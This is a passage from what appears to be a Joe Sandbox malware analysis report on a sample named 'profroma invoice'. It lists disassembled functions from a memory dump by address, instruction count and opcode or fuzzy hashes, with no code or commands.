                                                          • Instruction ID: c7bd3500c2d894b09af4a72431e6cd2e81b65d8c34c2d0db408df57d54b20f9f
                                                          • Opcode Fuzzy Hash: 9cb7753509b6af0d93178ca54b60dac28f1e22c34c5c55ab6cc9ac20d769016c
                                                          • Instruction Fuzzy Hash: 5721C1726047459BCB22CF18C880B6BF7E4FF88764F104529FD569B645E770EA418BA2
                                                          Function 0171E388 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction ID: d65b96d2c52a31645b5f877626b2e396c898f1bcbf3f556f19544533c26b2cec
                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction Fuzzy Hash: 64318D31600604AFD721CB68C884F6AB7B9EF85354F1445A9E952CB285EB30EE41CB50
                                                          Function 0179E609 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5aaa1b0b00cfd0010d0e0df219af4c8342c04eba3a3a8fc4c49c192d8b55d20
                                                          • Instruction ID: ff23f0a414599bd98804f85043c906c05edeb06d164cb9daf41ea2e1dd40f6da
                                                          • Opcode Fuzzy Hash: c5aaa1b0b00cfd0010d0e0df219af4c8342c04eba3a3a8fc4c49c192d8b55d20
                                                          • Instruction Fuzzy Hash: 3D31AE76A00205DFCF14CF1CD8849AEB7B9FF84304B158559E8499B391EB71EA54CBD0
                                                          Function 017A06F1 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3438b9b8b932a2d4e867251abcd09ea8c9d381383b27db75050b1515fc7a9c7a
                                                          • Instruction ID: 42da2182a094111df5432592c374bbaf51719258d6eba2d2209823125a9eae5b
                                                          • Opcode Fuzzy Hash: 3438b9b8b932a2d4e867251abcd09ea8c9d381383b27db75050b1515fc7a9c7a
                                                          • Instruction Fuzzy Hash: B0217C759002299BCF259F59C881ABEFBF8FF88740B900169F941AB244D738AD41CBA1
                                                          Function 017A019F Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ae9787faef851f24112cf9711a7fe550ad1310cb0c82dfa943589afb868405a
                                                          • Instruction ID: e7cba84b3b0403f82d2d836029fe03014a55042b56bba109cc018f9cf62cbef6
                                                          • Opcode Fuzzy Hash: 9ae9787faef851f24112cf9711a7fe550ad1310cb0c82dfa943589afb868405a
                                                          • Instruction Fuzzy Hash: 1D21AC71600645AFD725DB6CD848F6AF7B8FF88740F140569F904DB6A1D638ED40CBA8
                                                          Function 017A0283 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa936fba41e8cdf83f2ed323592e0ddfc1cc44a104cf6d584f84f0f312a0885f
                                                          • Instruction ID: ad1df3597ec0f5fa75f2ec48ff47e7fab01c101135d14740ce8e32cff5098f46
                                                          • Opcode Fuzzy Hash: aa936fba41e8cdf83f2ed323592e0ddfc1cc44a104cf6d584f84f0f312a0885f
                                                          • Instruction Fuzzy Hash: 8321F2729043469FD721EF59D848F6BFBDCAFD0240F084A9ABD90C7291D734D904C6A2
                                                          Function 01742835 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7124bdffd44c73897effc4700602be21e16f63e3489f55cff94db8bd0ec00e85
                                                          • Instruction ID: 03ad800860038be7be221b7b988620293635427d0263382307e5fccb22b6c058
                                                          • Opcode Fuzzy Hash: 7124bdffd44c73897effc4700602be21e16f63e3489f55cff94db8bd0ec00e85
                                                          • Instruction Fuzzy Hash: A921DA316856859BF322676C9C48F18FBD8AF81774F2903A1F920DB6D7D76CC891C250
                                                          Function 0175A30B Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e93c07b511b6470113cb145f3e6c06b4b043cbfbb134342f64f3374bf0ba3d8
                                                          • Instruction ID: f97b6e12607afd1bbee277a73f857ce05496913cc19faae65e9c9c92dc63f27e
                                                          • Opcode Fuzzy Hash: 6e93c07b511b6470113cb145f3e6c06b4b043cbfbb134342f64f3374bf0ba3d8
                                                          • Instruction Fuzzy Hash: EC21A975200B019FCB25DF29C800B46B7F5BF48B08F2485A8A949CBB66E775E942CF94
                                                          Function 017DA49A Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a02f59246f88f140b68387f964ece6de84958f72bfc2ec7fa3b3c9e3c76f4d3
                                                          • Instruction ID: 58af5f54e6fce52879784a7b32ed1d3280cd3586a9581265e8c92f1c9abdd7ec
                                                          • Opcode Fuzzy Hash: 5a02f59246f88f140b68387f964ece6de84958f72bfc2ec7fa3b3c9e3c76f4d3
                                                          • Instruction Fuzzy Hash: D1112C72380A157FD72256599C05F27F6ADEBD4B60F610028F709CB284DB70DC0187A5
                                                          Function 017A0946 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68bec799ef593b80977a394e2def094aff1fe13cd400abf27896e9e42ea5b00f
                                                          • Instruction ID: b2f5d72fca9b19c804d1f9375ae07f48ca1d0b94279175ef2f17d32f0ec1911b
                                                          • Opcode Fuzzy Hash: 68bec799ef593b80977a394e2def094aff1fe13cd400abf27896e9e42ea5b00f
                                                          • Instruction Fuzzy Hash: AB21E7B2E00219ABDB24DFAAD8849AEFBF8FF98710F10012EE505A7254D6749945CF54
                                                          Function 017B80A8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction ID: 0c80f8f86c82d5237754f18de824ce48ba888f8d5d20d04a44b43c6bebfd7bb4
                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction Fuzzy Hash: 02216D72A00209AFDB129F98CC84BEEFBB9EF88310F244859F910A7251D734D9509B50
                                                          Function 01750124 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction ID: b855022f780461d056029b86ec08d06f16f66064098b3152626368f4594f5e7f
                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction Fuzzy Hash: BF11EF72600605AFE7229B48CC44FAEFBB8EB80754F100029FE018B180E6B1ED44CB61
                                                          Function 01728770 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e146c9cb89d481697ca4709502c0c7d1e19682f93af973c33bfac4a727e90723
                                                          • Instruction ID: 3562a76ed7633cd201aff1f50a4831b338252cbdd746eab87c8937cbc57c3740
                                                          • Opcode Fuzzy Hash: e146c9cb89d481697ca4709502c0c7d1e19682f93af973c33bfac4a727e90723
                                                          • Instruction Fuzzy Hash: 8B1190327016659B9B11CF8DC4C0A66FBE9AF5A710B18406AEE089F305D6B2D9028791
                                                          Function 0175AAEE Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction ID: 081bdf5eb371b704dd6d319cccd26cce6ea4376b237a0b40e681158d2ca00bfb
                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction Fuzzy Hash: 1B218B72640641DFDB758F4DC544A66FBE6EB98B10F148A7DE94A8BA10E7B0EC01CB80
                                                          Function 017280E9 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c2e6626f1a42cf1b4668912bdfcf0dad97142a5c921ef35751786031a9ce07
                                                          • Instruction ID: 5a3446bac1f8d263224e5638e3838d8d15ffc746ecf829a137b9746eee0b7d56
                                                          • Opcode Fuzzy Hash: 19c2e6626f1a42cf1b4668912bdfcf0dad97142a5c921ef35751786031a9ce07
                                                          • Instruction Fuzzy Hash: 2F217C31A00205DFCB14CF58C580A6AFBF6FB88314F34416DD105AB391D772AE06CB91
                                                          Function 0175674D Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ad8cd859efb58498d0547162d63cf683dab516b56027109e5fc7df78ef6317d
                                                          • Instruction ID: 353315aa9678f3217e453cb508bb30a29ba4587d8e61876a8226647ce66ef38a
                                                          • Opcode Fuzzy Hash: 5ad8cd859efb58498d0547162d63cf683dab516b56027109e5fc7df78ef6317d
                                                          • Instruction Fuzzy Hash: F0218E71500A00EFD7608F68C840B66F7F8FF84350F44882DE99AC7651DAB0F940CB60
                                                          Function 017B6870 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcae52c933b0f95a12a565a1fead48b9bd72ec90e47240e7387e556d70552cf4
                                                          • Instruction ID: 46059bce567909894f35db24f9b54085310cb0f680a70a51e4fa35523ed79bd7
                                                          • Opcode Fuzzy Hash: bcae52c933b0f95a12a565a1fead48b9bd72ec90e47240e7387e556d70552cf4
                                                          • Instruction Fuzzy Hash: 45119132280514EBD722DB59C984FDAF7A8EB99A50F114069F315DB251DB70E901C7A0
                                                          Function 0174E8C0 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dca1c3b37e711551eef9493e551710bfb97c0e541d50567e8937fd8054306891
                                                          • Instruction ID: 0d3a87eb956f17bb3e858172471d9ae9a0bdcf307b1fdc28692cf7c8d2b00504
                                                          • Opcode Fuzzy Hash: dca1c3b37e711551eef9493e551710bfb97c0e541d50567e8937fd8054306891
                                                          • Instruction Fuzzy Hash: E7112B373001149FCB19DB29CC85A6BF25AEFD5374B354929DA22CB295EE709D42C391
                                                          Function 017566B0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9242986fffc594e777bfd7ae92f23bbeed6aa497e3bd733eda7ab895b8d17450
                                                          • Instruction ID: a42362c878e0d534f7d7b03bb57344259df00f54af63741ac1180d4e228e6bfe
                                                          • Opcode Fuzzy Hash: 9242986fffc594e777bfd7ae92f23bbeed6aa497e3bd733eda7ab895b8d17450
                                                          • Instruction Fuzzy Hash: 0F112076A01205DFCB65CF59C880A0AFBF8EF84210B5184B9ED059B315F7B0DE00CBA0
                                                          Function 017EA8E4 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction ID: d66fa6402fcfbb079c3bb48ef2cad1c19fa3b6a467cbe70907c7c334ed3ed5c2
                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction Fuzzy Hash: 83110436A00909AFDB19CB58C809B9DFBF5EF88210F058269E84597344E671AE51CBC0
                                                          Function 01720AD0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction ID: 5d618c3ae63ea1691159041bf3784480e0b189626bad9b0cd45f60c340d86b33
                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction Fuzzy Hash: 4321C4B5A40B459FD3A0CF29D541B56BBF4FB48B10F10492EE98AC7B50E371E854CBA4
                                                          Function 017AE7E1 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction ID: 0984c7eefd14c5747cb2eea49c2ace7df11ce12170d4c16ba845969cd218c2c0
                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction Fuzzy Hash: 2711CE32680601EFEB219F48CC44B5AFBE5EFC5754F459628EA09AB260DF31DD40DBA0
                                                          Function 017427ED Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15880595634f5e21d9041a7e6b83aa15eccb7c25978ad6de499f18ba1c8e480b
                                                          • Instruction ID: a441e7a873a2b046634c68d07276af68cff49b27b5ecf7a50c5ecf5452876e87
                                                          • Opcode Fuzzy Hash: 15880595634f5e21d9041a7e6b83aa15eccb7c25978ad6de499f18ba1c8e480b
                                                          • Instruction Fuzzy Hash: 0301D631785685ABF326A66DE88CF2BFB9CEF80394F0500B5F900CB256DA64DC40C271
                                                          Function 01724690 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a98da6294029bf71d12aa80a990529478767b6d6f3f09b1f90ab7b6ae5fcb92c
                                                          • Instruction ID: 0aee1b26c4296cc96f2c9409d419979c41e5be0e9d75545e8d298cf96b1ba314
                                                          • Opcode Fuzzy Hash: a98da6294029bf71d12aa80a990529478767b6d6f3f09b1f90ab7b6ae5fcb92c
                                                          • Instruction Fuzzy Hash: 9C11E536340665EFDB25CF59D844F56BBA8EB86764F004519FA2A8B350C770E801CF60
                                                          Function 017F4B00 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd3bdf08a7fd89fc17449e53fa22c6d6da34c4b3aa23d726e0e5d13b338143bd
                                                          • Instruction ID: c6966505a60b85342f623a6e756bd2eff4ea7d8b4453de0c2c2c9aaba945d316
                                                          • Opcode Fuzzy Hash: fd3bdf08a7fd89fc17449e53fa22c6d6da34c4b3aa23d726e0e5d13b338143bd
                                                          • Instruction Fuzzy Hash: 9F110232200A099FD7229A2DD844F27F7A6FFC4310F18442EEB83C7395DA30A802CB90
                                                          Function 01756620 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 258fb23290f45ca2f1569e1fd1ddaddcdfe1740afba67602ab7c31585e73935a
                                                          • Instruction ID: 27e72f2ebaeac4caccc9b1dcc333c7b34a4ce31e90dd64de5046e75329c50386
                                                          • Opcode Fuzzy Hash: 258fb23290f45ca2f1569e1fd1ddaddcdfe1740afba67602ab7c31585e73935a
                                                          • Instruction Fuzzy Hash: 7111CE72A00615ABDB21DF59C980B5EFBB8EF88740F900458EE00A7205DBB4EE018BA0
                                                          Function 0174EA2E Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3da6d19ddbdbf251acd582c730b48642b09cb221ae0e5bf93e42219d90b78ea
                                                          • Instruction ID: 2543ec3a4d8457063714f64778192fae10fd15059ba0f5a20e95a43db4d5b0e1
                                                          • Opcode Fuzzy Hash: b3da6d19ddbdbf251acd582c730b48642b09cb221ae0e5bf93e42219d90b78ea
                                                          • Instruction Fuzzy Hash: 98018C726001099FC725DF19D448E26FBF9FBC6324F24816AE1058B669DBB4AE46CB90
                                                          Function 0174E53E Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction ID: deacda974188022ee9d7653dd4efbdca4baa2927fc79eff79640ca229b505cb8
                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction Fuzzy Hash: EC11E5712416C69BE723A72CD948B25FBD4FB41764F2900E0DE41C7643FB2CC982C291
                                                          Function 017AE75D Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction ID: 61c69edab4d600823a28b8077b56d580f23ac292fc4aabf9d9139b60ddd5da11
                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction Fuzzy Hash: D901DE32600206AFE7219F58C844F5AFFA9EBC4B60F458234EA059B260EB71DD80CB90
                                                          Function 0171A250 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction ID: 35a86f2b49c77f942a3942863c31318f52c84975cb5e837335d51152aea23c32
                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction Fuzzy Hash: 7901267141A7619BCB318F1DD840AB2BBA4EF95760B00852DFC958B689C331D400CB60
                                                          Function 017F4940 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c798c836fc05763ffabdf36baf3597344124713b1bed530b7a0d7b82e004287a
                                                          • Instruction ID: 89fa8719b53c89681c1dea67a2e651d2800a7167b44b68d837112e98f8d3a64d
                                                          • Opcode Fuzzy Hash: c798c836fc05763ffabdf36baf3597344124713b1bed530b7a0d7b82e004287a
                                                          • Instruction Fuzzy Hash: B301C4736415019BC732DF1CD844E13F7A8EB91770B254259EAAA9B296E730D901CB90
                                                          Function 0179E1D0 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e70641236056d17fa2a2ff4e848cdd392b874154b62a174434097fd124504916
                                                          • Instruction ID: e5405f63ded2263df0627d9f48d5aa67ddfac4b84968a5db36524a5db096031b
                                                          • Opcode Fuzzy Hash: e70641236056d17fa2a2ff4e848cdd392b874154b62a174434097fd124504916
                                                          • Instruction Fuzzy Hash: 7A11ED32241641EFCB25EF19DC80F06BBB8FF58B44F2000A5EA058B6A1C635ED01CA90
                                                          Function 01726259 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8f7fe4376fdf1ef4c960e4a5254864298230b524544391c6dd91cb165f4441e
                                                          • Instruction ID: 576337592c3a2e1eb150373175364edfc9d8d2d6782131062dc70055b11ae4f9
                                                          • Opcode Fuzzy Hash: b8f7fe4376fdf1ef4c960e4a5254864298230b524544391c6dd91cb165f4441e
